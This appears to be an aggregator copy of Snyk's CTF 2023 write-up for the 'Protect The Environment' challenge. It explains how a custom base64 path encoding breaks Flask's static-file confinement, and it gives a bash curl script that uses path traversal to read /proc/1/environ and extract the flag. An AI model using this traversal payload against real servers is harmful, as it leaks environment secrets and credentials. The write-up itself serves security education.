Snyk Fetch the Flag CTF 2023 writeup: Protect The Environment
source link: https://snyk.io/blog/snyk-fetch-the-flag-ctf-2023-writeup-protect-the-environment/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Snyk Fetch the Flag CTF 2023 writeup: Protect The Environment
November 30, 2023
2 mins readThanks for playing Fetch with us! Congrats to the thousands of players who joined us for Fetch the Flag CTF. If you were at Snyk’s 2023 Fetch the Flag and are looking for the answer to the Protect The Environment challenge, you’ve come to the right place. Let’s walk through the solution together!
The challenge uses a hand-rolled base64 encoding layer for paths. This seems fine, but it breaks Flask's ability to automatically chroot static files. This is a file inclusion attack, but instead of including a file, you include the /proc/<pid>/environ file. The user is not told or given any way to discover the PID, but this is not a problem since PID 1 works (or you can simply enumerate them and you'll get a hit on PID 8, as that is what Gunicorn workers use).
#!/bin/bash
if [[ -z "$1" ]]
then
echo "IP address or hostname not specified"
exit 1
fi
if [[ -z "$2" ]]
then
echo "Port not specified"
exit 1
fi
curl -s http://$1:$2/`echo "assets/../../../../../../proc/1/environ" | base64` -o - | strings | grep -oE "flag{.*?}" --color=noneThanks for making Fetch happen!
A huge thank you to all the teams in Fetch the Flag 2023! It was great seeing all of you there and you can always find me on YouTube.
Here are the writeups for the other 2023 challenges. Dig in!
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK